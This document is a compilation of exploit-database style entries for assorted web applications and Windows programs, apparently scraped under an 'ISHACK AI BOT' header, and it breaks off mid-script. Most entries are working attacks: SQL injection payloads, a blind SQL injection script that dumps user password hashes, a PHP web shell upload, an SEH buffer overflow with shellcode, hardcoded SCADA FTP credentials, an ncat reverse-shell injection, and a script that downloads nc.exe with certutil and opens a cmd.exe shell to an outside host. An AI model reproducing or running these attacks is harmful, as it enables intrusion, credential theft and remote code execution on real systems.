ISHACK AI BOT

# Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection # Date: 2020-06-23 # Exploit Author: Eren Şimşek # Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL # Version: v1.0 # Tested on: Linux - Wamp Server >Vulnerable File /category.php >Vulnerable Code $id=$_REQUEST['id']; $query="SELECT * from blog_categories where id='".$id."'"; Id parameter enters sql query without any changes >Proof Of Concept sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch OR http://TARGET/resblog/category.php?id=1' Single Quote will cause SQL error

# Exploit Title: Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student) # Google Dork: N/A # Date: 2020-06-20 # Exploit Author: BKpatron # Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: This product is unprotected against CSRF vulnerabilities. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. you can upload a PHP file here with CSRF. # CSRF PoC( add student ,File Upload): <html> <body> <form enctype="multipart/form-data" method="POST" action="http://localhost/student_enrollment/admin/index.php?page=add-student"> <label for="name">Student Name</label> <input name="name" type="text" id="name" value="" required=""><br/> <label for="roll">Student Roll</label> <input name="roll" type="text" value="" pattern="[0-9]{6}" id="roll" required=""><br/> <label for="address">Student Address</label> <input name="address" type="text" value="" id="address" required=""><br/> <label for="pcontact">Parant Contact NO</label> <input name="pcontact" type="text" id="pcontact" pattern="01[5|6|7|8|9][0-9]{8}" value="" placeholder="01........." required=""><br/> <label for="class">Student Class</label> <select name="class" class="form-control" id="class" required=""><br/> <option>Select</option> <option value="1st">1st</option> <option value="2nd">2nd</option> <option value="3rd">3rd</option> <option value="4th">4th</option> <option value="5th">5th</option> </select><br/> <label for="photo">Student Photo</label> <input name="photo" type="file" id="photo" required=""><br/> <input name="addstudent" value="Add Student" type="submit" class="btn btn-danger"> </form> </body> </html> #HTTP Request: http://localhost/student_enrollment/admin/index.php?page=add-student POST /student_enrollment/admin/index.php?page=add-student HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------1586330740172 Content-Length: 1669 Referer: http://localhost/exploit2.php Cookie: _ga=GA1.1.1667382299.1577635358; PHPSESSID=2dhsgkdiavgfefp6g0qp63ruqe Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------1586330740172: undefined Content-Disposition: form-data; name="name" bkpatron -----------------------------1586330740172 Content-Disposition: form-data; name="roll" 333000 -----------------------------1586330740172 Content-Disposition: form-data; name="address" 0000 -----------------------------1586330740172 Content-Disposition: form-data; name="pcontact" 01911111111 -----------------------------1586330740172 Content-Disposition: form-data; name="class" 1st -----------------------------1586330740172 Content-Disposition: form-data; name="photo"; filename="up.php" Content-Type: application/octet-stream ... // uploaded file path: http://localhost/student_enrollment/admin/images/your_file.php

# Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC) # Vendor Homepage: http://www.codeblocks.org/ # Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download # Exploit Author: Paras Bhatia # Discovery Date: 2020-06-23 # Vulnerable Software: Code Blocks # Version: 20.03 # Vulnerability Type: Denial of Service (DoS) # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) #Steps to Produce the Crash: # 1.- Run python code: CodeBlocksCrash.py # 2.- Copy content to clipboard # 3.- Open "codeblocks.exe" # 4.- In the "Management" section on left hand side, Click on "FSymbols" tab. # 5.- Select "Active project's symbols" from drop down "View:" menu. # 6.- Paste ClipBoard into the "Search:" field. # 7.- Press Enter from keyboard. # 8.- Crashed. ################################################################################################################################################## #Python "CodeBlocksCrash.py" Code: f= open("CodeBlocksCrash.txt", "w") payload="\x41" * 5000 f.write(payload) f.close()

# Exploit title: BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting # Exploit Author: William Summerhill # Date: 2020-06-22 # Vendor homepage: https://www.globalradar.com/ # Tested on: Window # CVE-2020-14943 # Description: The "Firstname" and "Lastname" parameters in Global RADAR BSA Radar 1.6.7234.X # are vulnerable to a stored Cross-Site Scripting (XSS) via the Update User Profile feature # (in the top-right of the application). # Proof of Concept: Using the "update user profile" feature in the top-right of the application while logged in, a malicious user can inject malicious, unencoded scripts, such as "<script>alert(1)</script>", into the Firstname and Lastname parameters of a user account. This stored XSS will execute on nearly every application page as these parameters are always present while logged in. This attack can be further leveraged by utilizing an existing authorization bypass exploit (CVE-2020-14944) to inject stored XSS payloads into these parameters for arbitrary existing user accounts. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14943

# Exploit Title: Lansweeper 7.2 - Incorrect Access Control # SHODAN DORK : title:"Lansweeper - Login" # Date: 2020-06-14 # Exploit Author: Amel BOUZIANE-LEBLOND # Vendor Homepage: https://www.lansweeper.com/ # Software Link: https://www.lansweeper.com # Version: 6.0.x through 7.2.x # Tested on: Windows # CVE : CVE-2020-14011 ### Title: Incorrect Access Control. ### Category: Exploit ### Severity: Critical ### Description: Lansweeper 6.0.x through 7.2.x has a default installation in which the admin password is configured for the admin account, unless "Built-in admin" is manually unchecked. This allows command execution via the Add New Package and Scheduled Deployments features. ### Other observation: Hi, This issue is kind of critical, By using shodan with this filter title:"Lansweeper - Login" We will find some Lansweeper with default installation on it ### Details: The Lansweeper application is agentless network inventory software that can be used for IT asset management. It uses the ASP.NET technology on its web application. ### Analysis: When you install Lansweeper 6.0 or a more recent Lansweeper release and access the web console for the first time, you are presented with a First Run Wizard, which allows you to set up scanning and configure some basic options. Any subsequent times you access the console, you are presented with a login screen. By default, everyone in your network can access all of Lansweeper's features and menus simply by browsing to the web console URL and hitting the Built-in Admin button. ### Suggested mitigation: restrict access to the console and configure what users can see or do once they've been granted access. You assign a built-in or custom user role, a set of permissions, to user groups or individual user accounts. A user's role determines what the user can see or do within the console.. ### Impact/Risk: Remote code execution can expose the organization to unauthorized access of data and programs, fraud. -- Amel BOUZIANE-LEBLOND

# Exploit Title: mySCADA myPRO v7 Hardcoded Credentials # Date: 2018-07-02 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: http://myscada.org # Software Link: https://www.myscada.org/mypro/ # Version: v7.0.45 # Tested on: Windows/Linux # CVE-2018-11311 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311 # https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password # PoC ftp [IP] 2121 username: myscada password: Vikuk63

# Exploit Title: FHEM 6.0 - Local File Inclusion # Date: 2020-02-10 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://fhem.de/ # Software Link: https://fhem.de/#Download # Version: v6.0 # Tested on: Windows # Link: https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability # PoC To exploit vulnerability, someone could use 'http:// [HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text' request to get some informations from the target by changing "file" parameter. GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1

# Exploit Title: OpenEMR 5.0.1 - 'controller' Remote Code Execution # Date: 2020-06-22 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads # Version: v5.0.1 # Tested on: Linux # Link: https://github.com/EmreOvunc/OpenEMR_Vulnerabilities # PoC To exploit vulnerability, someone could use 'http://[HOST]/controller.php?document&upload&patient_id=00&parent_id=4&' post request to upload malicious php codes. POST /openemr-5.0.1/controller.php?document&upload&patient_id=00&parent_id=4& HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.155.140/openemr-5.0.1/controller.php?document&upload&patient_id=00&parent_id=4& Content-Type: multipart/form-data; boundary=---------------------------141194333536146869123947219434 Content-Length: 842 Origin: http://172.16.155.140 DNT: 1 Connection: close Cookie: OpenEMR=t1lugo5qrbhv7mc2c3q9ricsnl; TreeMenuBranchStatus=objTreeMenu_1_node_1_9; PHPSESSID=dfhapc4v0bskt7pcpmc2j93agq; LS-VQGNEIWNPEBSNBWE=6rm848pgjj78hhecpb9roo8af1; YII_CSRF_TOKEN=OWYyM0lybGFtRF9wcHRkZ1lldF9WblhoVHlVNk5HRW3WMnZhghJHNtBjyIuALM94Ww3gltGLoeKETBSfevfbCw%3D%3D Upgrade-Insecure-Requests: 1 -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="MAX_FILE_SIZE" 64000000 -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="file[]"; filename="shell_info.php" Content-Type: text/php <?php phpinfo(); ?> -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="destination" -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="patient_id" 00 -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="category_id" 4 -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="process" true -----------------------------141194333536146869123947219434--

# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path # Date: 2020-06-26 # Exploit Author: Ethan Seow # Vendor Homepage: https://windscribe.com # Version: v1.83 Build 20 # Tested on: Microsoft Windows 10 Home 10.0.18363 Build 18363 #filename : exploit.bat #Code start @echo off sc config WindscribeService binPath="cmd /k {PATH TO REVERSE SHELL e.g. C:\Users\Public\payload.exe}" sc stop WindscribeService sc start WindscribeService echo Exploit success! SYSTEM reverse shell should be triggered :DDDDD pause #Code end

# Exploit Title: Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-06-28 # Exploit Author: Anushree Priyadarshini # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Windows 10 # CVE: CVE-2020-15599 Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting Payload for 'user_firstname' : <script>alert(1)</script> Payload for 'user_lastname' : <script>alert(2)</script> POST /CMSsite-master/register.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9,en-GB;q=0.8,en-CA;q=0.7,zh-CN;q=0.6,zh-HK;q=0.5,zh-SG;q=0.4,zh-TW;q=0.3,ja;q=0.2,ko;q=0.1 Accept-Encoding: gzip, deflate Referer: http://localhost/CMSsite-master/register.php Content-Type: application/x-www-form-urlencoded Content-Length: 190 Connection: close Cookie: PHPSESSID=491d4jir62vldd0u84knd1m1fi Upgrade-Insecure-Requests: 1 user_name=DemoUser&user_firstname=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&user_lastname=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&user_email=Hack%40gmail.com&user_password=1234&register=

# Exploit Title: KiteService 1.2020.618.0 - Unquoted Service Path # Discovery by: PoisonSk # Discovery Date: 2020-06-23 # Vendor Homepage: https://www.kite.com/ # Software Link : https://www.kite.com/download/ # Tested Version: 1.2020.618.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Home Single 10.0.18363 N/D Compilación 18363 # Steps to discover unquoted Service Path: C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i "program " | findstr /i /v """ KiteService KiteService C:\Program Files\Kite\KiteService.exe Auto C:\Users>sc qc KiteService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: KiteService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : KiteService DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # Exploit: #A successful attempt would require the local attacker must insert an executable file in the path of the service. #Upon service restart or system reboot, the malicious code will be run with elevated privileges.

# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection # Date: 2020-06-28 # Google Dork: "Copyright 2020 Reside Property Management" # Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari) # Team Members: Behzad Khalifeh , Milad Ranjbar # Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/ # Version: v3.0 [Final Version] # Tested on: Windows/Linux # CVE: N/A .:: Description ::. RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device. .:: Vulnerable File ::. profile.php .:: Vulnerable Code ::. - Line 21: $profile = $_GET['profile']; - Line 22: $adminsName = preg_replace('/-/', ' ', $profile); - Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'"; - Line 91: mysqli_query $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error()); .:: Proof Of Concept (PoC) ::. Step 1 - Find Your Target With the above Dork. Step 2 - Find profile.php File in Target Step 3 - Inject Your Payloads in profile parameter .:: Sample Request ::. localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23

# Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection # Date: 2020-06-29 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://github.com/amitkolloldey/elearning-script # Software Link: https://github.com/amitkolloldey/elearning-script # Version: 0.1.0 # Tested on: Kali Linux Source code(search.php): <?php if(isset($_GET['search_submit'])){ $search_key = $_GET['search']; $search = "select * from posts where post_keywords like '%$search_key%'"; $run_search = mysqli_query($con,$search); $count = mysqli_num_rows($run_search); if($count == 0){ echo "<h2>No Result Found.Please Try With Another Keywords.</h2>"; }else{ while($search_row = mysqli_fetch_array($run_search)): $post_id = $search_row ['post_id']; $post_title = $search_row ['post_title']; $post_date = $search_row ['post_date']; $post_author = $search_row ['post_author']; $post_featured_image = $search_row ['post_image']; $post_keywords = $search_row ['post_keywords']; $post_content = substr($search_row ['post_content'],0,200); ?> Payload: http://127.0.0.1/e/search.php?search=a&search_submit=Search http://127.0.0.1/e/search.php?search=a'OR (SELECT 3475 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(3475=3475,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsDG&search_submit=Search

# Exploit Title: RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC) # Exploit Author: Paras Bhatia # Discovery Date: 2020-06-29 # Vulnerable Software: RM Downloader # Software Link Download: https://github.com/x00x00x00x00/RMDownloader_2.50.60/raw/master/RMDownloader.exe # Version: 2.50.60 2006.06.23 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) # Proof of Concept: # 1.- Run the python script, it will create a new file "RM_LCE.txt" # 2.- Copy the content of the new file 'RM_LCE.txt' to clipboard # 3.- Turn off DEP for RMDownloader.exe # 4.- Open 'RMDownloader.exe' # 5.- Go to 'Load' tab # 6.- Paste clipboard in 'Load' parameter # 7.- Click on button 'OK' # 8.- Two messageboxes will pop up, click OK # 9.- Calc.exe runs. ################################################################################################################################################# #Python "RM_LCE.py" Code: f= open("RM_LCE.txt", "w") junk="\x41" * 336 egg = "w00tw00t" # msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -b "\x0a\x0d\x00" buf = "" buf += "\xd9\xeb\xb8\xfa\x38\xad\x4f\xd9\x74\x24\xf4\x5a\x29" buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xee\xda" buf += "\x58\xb3\xe6\x99\xa3\x4c\xf6\xfd\x2a\xa9\xc7\x3d\x48" buf += "\xb9\x77\x8e\x1a\xef\x7b\x65\x4e\x04\x08\x0b\x47\x2b" buf += "\xb9\xa6\xb1\x02\x3a\x9a\x82\x05\xb8\xe1\xd6\xe5\x81" buf += "\x29\x2b\xe7\xc6\x54\xc6\xb5\x9f\x13\x75\x2a\x94\x6e" buf += "\x46\xc1\xe6\x7f\xce\x36\xbe\x7e\xff\xe8\xb5\xd8\xdf" buf += "\x0b\x1a\x51\x56\x14\x7f\x5c\x20\xaf\x4b\x2a\xb3\x79" buf += "\x82\xd3\x18\x44\x2b\x26\x60\x80\x8b\xd9\x17\xf8\xe8" buf += "\x64\x20\x3f\x93\xb2\xa5\xa4\x33\x30\x1d\x01\xc2\x95" buf += "\xf8\xc2\xc8\x52\x8e\x8d\xcc\x65\x43\xa6\xe8\xee\x62" buf += "\x69\x79\xb4\x40\xad\x22\x6e\xe8\xf4\x8e\xc1\x15\xe6" buf += "\x71\xbd\xb3\x6c\x9f\xaa\xc9\x2e\xf5\x2d\x5f\x55\xbb" buf += "\x2e\x5f\x56\xeb\x46\x6e\xdd\x64\x10\x6f\x34\xc1\xee" buf += "\x25\x15\x63\x67\xe0\xcf\x36\xea\x13\x3a\x74\x13\x90" buf += "\xcf\x04\xe0\x88\xa5\x01\xac\x0e\x55\x7b\xbd\xfa\x59" buf += "\x28\xbe\x2e\x3a\xaf\x2c\xb2\x93\x4a\xd5\x51\xec" nseh ="\xeb\x06\x90\x90" #1002C531 5B POP EBX #1002C532 58 POP EAX #1002C533 C3 RETN #C:\Program Files\RM Downloader\RDutility02.dll seh="\x31\xc5\x02\x10" nops="\x90" * 20 egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" egghunter += "\x77\x30\x30\x74" # this is the marker/tag: w00t egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7" payload = junk + egg + buf + nseh + seh + nops + egghunter f.write(payload) f.close

# Exploit Title: PHP-Fusion 9.03.60 - PHP Object Injection # Date: 2020-05-26 # Exploit Author: coiffeur # Vendor Homepage: https://www.php-fusion.co.uk/home.php # Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php # Version: v9.03.60 # Description: # PHP Object Injection to SQL injection (pre-auth) import sys import requests import subprocess GENERATOR_NAME = "gen.php" GENERATOR_CONTENT = """<?php if (count($argv) < 2) { echo 'Usage: php gen.php "<PAYLOAD>"'; die; } $ar["comment_item_id"] = "1"; $ar["comment_item_type"] = $argv[1]; $payload = urlencode(base64_encode(serialize($ar))); echo $payload; ?> """ DEBUG = 1 DELTA = None TRESHOLD = 0.60 LIKE = "f%admin" COLUMNS = ["user_id", "user_name", "user_algo", "user_salt", "user_password", "user_admin_algo", "user_admin_salt", "user_admin_password", "user_email"] def usage(): banner = """NAME: PHPFusion v9.03.50, PHP Object Injection to SQL injection SYNOPSIS: python poi_to_sqli_9.03.50.py <URL> DESCRIPTION: Dump the content of the table named fusionX...X_users AUTHOR: coiffeur """ print(banner) def generator(action): if action == "w": with open(GENERATOR_NAME, "w") as f: f.write(GENERATOR_CONTENT) if action == "r": _ = subprocess.Popen(["rm", GENERATOR_NAME], stdout=subprocess.PIPE) def generate_payload(text): p = subprocess.Popen(["php", GENERATOR_NAME, text], stdout=subprocess.PIPE) out, _ = p.communicate() return out def check(payload): datas = {"comment_options": generate_payload(payload)} r = requests.post( url=f"{sys.argv[1]}/includes/classes/PHPFusion/Feedback/Comments.ajax.php", data=datas) return r.elapsed.total_seconds() def evaluate_delay(): global DELTA deltas = [] payload = "' UNION SELECT SLEEP(2)-- - '" for _ in range(3): deltas.append(check(payload)) DELTA = sum(deltas)/len(deltas) def get_tbl_name_len(): i = 0 while 1: payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<{i} THEN SLEEP(2) ELSE 0 END) -- - '" if check(payload) >= DELTA*TRESHOLD: return i-1 if i > 100: print(f"[x] Exploit failed") exit(-1) i += 1 def get_tbl_name(length): tbl_name = "" for i in range(1, length+1): min, max = 0, 127-1 while min < max: mid = (max + min) // 2 payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR(table_name,{i},1)) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '" if check(payload) >= DELTA*TRESHOLD: max = mid else: min = mid + 1 tbl_name += chr(min) if DEBUG: print(f"[DEBUG] Table name: {tbl_name}") return tbl_name def get_rows_number(tbl_name): i = 0 while 1: payload = f"' UNION SELECT (CASE WHEN (SELECT COUNT(user_name) FROM {tbl_name})>{i} THEN 0 ELSE SLEEP(2) END) -- - '" if check(payload) >= DELTA*TRESHOLD: return i i += 1 def get_elt_len(tbl_name, column_name, offset): i = 0 while 1: payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1 OFFSET {offset})<{i} THEN SLEEP(2) ELSE 0 END) -- - '" if check(payload) >= DELTA*TRESHOLD: if DEBUG: print( f"[DEBUG] Element {offset} in {column_name} from {tbl_name} length: {i-1}") return i-1 i += 1 def get_elt(tbl_name, column_name, offset, length): elt = "" for i in range(1, length+1): min, max = 0, 127-1 while min < max: mid = (max + min) // 2 payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR({column_name},{i},1)) FROM {tbl_name} LIMIT 1 OFFSET {offset} )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '" if check(payload) >= DELTA*TRESHOLD: max = mid else: min = mid + 1 elt += chr(min) if DEBUG: print( f"[DEBUG] Element {offset} in {column_name} from {tbl_name}: {elt}") print(f"[*] Element {offset} in {column_name} from {tbl_name}: {elt}") return elt def get_rows(tbl_name, row_number): print(f"[*] Trying to dump {tbl_name}") rows = [] for offset in range(row_number): row = [] for column_name in COLUMNS: elt_length = get_elt_len(tbl_name, column_name, offset) row.append(get_elt(tbl_name, column_name, offset, elt_length)) print(f"[*] Row {offset}: {row}") rows.append(row) print(f"[*] Rows: {rows}") def main(): if len(sys.argv) < 2: print(usage()) exit(-1) if DEBUG: print(f"[*] Target: {sys.argv[1]}") if DEBUG: print(f"[DEBUG] Writting generator to {GENERATOR_NAME}") generator("w") evaluate_delay() if DEBUG: print(f"[*] Delta: {DELTA}") tbl_name_len = get_tbl_name_len() if DEBUG: print( f"[DEBUG] Looking for table like {LIKE} with length {tbl_name_len}") tbl_name = get_tbl_name(tbl_name_len) print(f" Table name: {tbl_name}") prefix = f"{tbl_name.split('_')[0]}_" print(f"[*] Prefix: {prefix}") user_table_name = f"{prefix}users" number_of_rows = get_rows_number(user_table_name) if DEBUG: print(f"[*] {user_table_name} got {number_of_rows} rows") get_rows(user_table_name, number_of_rows) if DEBUG: print(f"[DEBUG] Removing {GENERATOR_NAME}") generator("r") if __name__ == "__main__": main()

# Exploit Title: Online Shopping Portal 3.1 - Authentication Bypass # Date: 2020-06-25 # Exploit Author: Ümit Yalçın # Vendor Homepage: https://phpgurukul.com/shopping-portal-free-download/ # Version: 3.1 # Tested on: Windows 10 / WampServer 1- Authentication Bypass Go to following url! http://localhost/shopping/admin/ Default admin username is admin, to bypass authentication use sql bypass like '# or ' OR 1=1# username = admin'# passwrod = what ever you want 2- Uploading Shell to Remote Code Execution After bypassed the authentication go to insert-product field http://localhost/shopping/admin/insert-product.php after that, upload you shell , as an example <?php $exe = shell_exec($_REQUEST['cmd']); echo $exe; ?> and go to http://localhost/shopping/admin/productimages/ and all possible folders named with number from 1 like http://localhost/shopping/admin/productimages/1 http://localhost/shopping/admin/productimages/2 http://localhost/shopping/admin/productimages/3 http://localhost/shopping/admin/productimages/4 http://localhost/shopping/admin/productimages/5 When you find your shell, for example you found at 21 TARGET/shopping/admin/productimages/21/shell.php?cmd=CODE_YOU_WANT_TO_EXECUTE

# Exploit Title: OCS Inventory NG 2.7 - Remote Code Execution # Date: 2020-06-05 # Exploit Author: Askar (@mohammadaskar2) # CVE: CVE-2020-14947 # Vendor Homepage: https://ocsinventory-ng.org/ # Version: v2.7 # Tested on: Ubuntu 18.04 / PHP 7.2.24 #!/usr/bin/python3 import requests import sys import warnings import random import string from bs4 import BeautifulSoup from urllib.parse import quote warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') if len(sys.argv) !=3D 6: print("[~] Usage : ./ocsng-exploit.py url username password ip port") exit() url =3D sys.argv[1] username =3D sys.argv[2] password =3D sys.argv[3] ip =3D sys.argv[4] port =3D sys.argv[5] request =3D requests.session() def login(): login_info =3D { "Valid_CNX": "Send", "LOGIN": username, "PASSWD": password } login_request =3D request.post(url+"/index.php", login_info) login_text =3D login_request.text if "User not registered" in login_text: return False else: return True def inject_payload(): csrf_req =3D request.get(url+"/index.php?function=3Dadmin_conf") content =3D csrf_req.text soup =3D BeautifulSoup(content, "lxml") first_token =3D soup.find_all("input", id=3D"CSRF_10")[0].get("value") print("[+] 1st token : %s" % first_token) first_data =3D { "CSRF_10": first_token, "onglet": "SNMP", "old_onglet": "INVENTORY" } req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=3Dfir= st_data) content2 =3D req.text soup2 =3D BeautifulSoup(content2, "lxml") second_token =3D soup2.find_all("input", id=3D"CSRF_14")[0].get("value"= ) print("[+] 2nd token : %s" % second_token) payload =3D "; ncat -e /bin/bash %s %s #" % (ip, port) #RELOAD_CONF=3D&Valid=3DUpdate inject_request =3D { "CSRF_14": second_token, "onglet": "SNMP", "old_onglet": "SNMP", "SNMP": "0", "SNMP_INVENTORY_DIFF": "1", # The payload should be here "SNMP_MIB_DIRECTORY": payload, "RELOAD_CONF": "", "Valid": "Update" } final_req =3D request.post(url+"/index.php?function=3Dadmin_conf", data= =3Dinject_request) if "Update done" in final_req.text: print("[+] Payload injected successfully") execute_payload() def execute_payload(): csrf_req =3D request.get(url+"/index.php?function=3DSNMP_config") content =3D csrf_req.text soup =3D BeautifulSoup(content, "lxml") third_token =3D soup.find_all("input", id=3D"CSRF_22")[0].get("value") third_request =3D request.post(url+"/index.php?function=3DSNMP_config",= files=3D{ 'CSRF_22': (None, third_token), 'onglet': (None, 'SNMP_MIB'), 'old_onglet': (None, 'SNMP_RULE'), 'snmp_config_length': (None, '10') }) print("[+] 3rd token : %s" % third_token) third_request_text =3D third_request.text soup =3D BeautifulSoup(third_request_text, "lxml") forth_token =3D soup.find_all("input", id=3D"CSRF_26")[0].get("value") print("[+] 4th token : %s" % forth_token) print("[+] Triggering payload ..") print("[+] Check your nc ;)") forth_request =3D request.post(url+"/index.php?function=3DSNMP_config",= files=3D{ 'CSRF_26': (None, forth_token), 'onglet': (None, 'SNMP_MIB'), 'old_onglet': (None, 'SNMP_MIB'), 'update_snmp': (None, 'send') }) if login(): print("[+] Valid credentials!") inject_payload()

# Exploit Title: ZenTao Pro 8.8.2 - Command Injection # Date: 2020-07-01 # Exploit Author: Daniel Monzón & Melvin Boers # Vendor Homepage: https://www.zentao.pm/ # Version: 8.8.2 # Tested on: Windows 10 / WampServer # Other versions like pro or enterprise edition could be affected aswell # Netcat is needed to use this exploit import requests import hashlib import urllib.parse host = 'http://192.168.223.132' username = 'admin' password = 'Test123!@#' name = 'Test2' command = 'certutil.exe+-urlcache+-f+-split+http%3A%2F%2F192.168.223.131%2Fnc.exe+C%3A%5Cbad.exe+%26%26' command2 = 'C:\\bad.exe 192.168.223.131 9001 -e cmd.exe &&' git_path = 'C%3A%5CProgramData' x = requests.session() # Create a session, as needed because we need admin rights. def sign_in(url, username, password): password = hashlib.md5(password.encode('utf-8')).hexdigest() # We need to md5 encode the password in order to sign in proxy = {'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080'} # Just for debugging phase credentials = {'account' : username, 'password' : password} # The credentials we need path = url + '/zentao/user-login.html' # URL + path x.post(path, data=credentials, proxies=proxy, verify=False) # Send the post request to sign in return '[*] We are signed in!' def go_to_repo(url): path = url + '/zentao/repo-browse.html' x.get(path, verify=False) print('[*] Getting to repo path') def create_repo(url, name, command): headers = {'Accept':'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest', 'Origin':'http://192.168.223.132', 'Referer':'http://192.168.223.132/pro/repo-create.html', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0', 'Accept-Language':'en-US,en;q=0.5'} cookies = {'ajax_lastNext':'on', 'windowWidth':'1846', 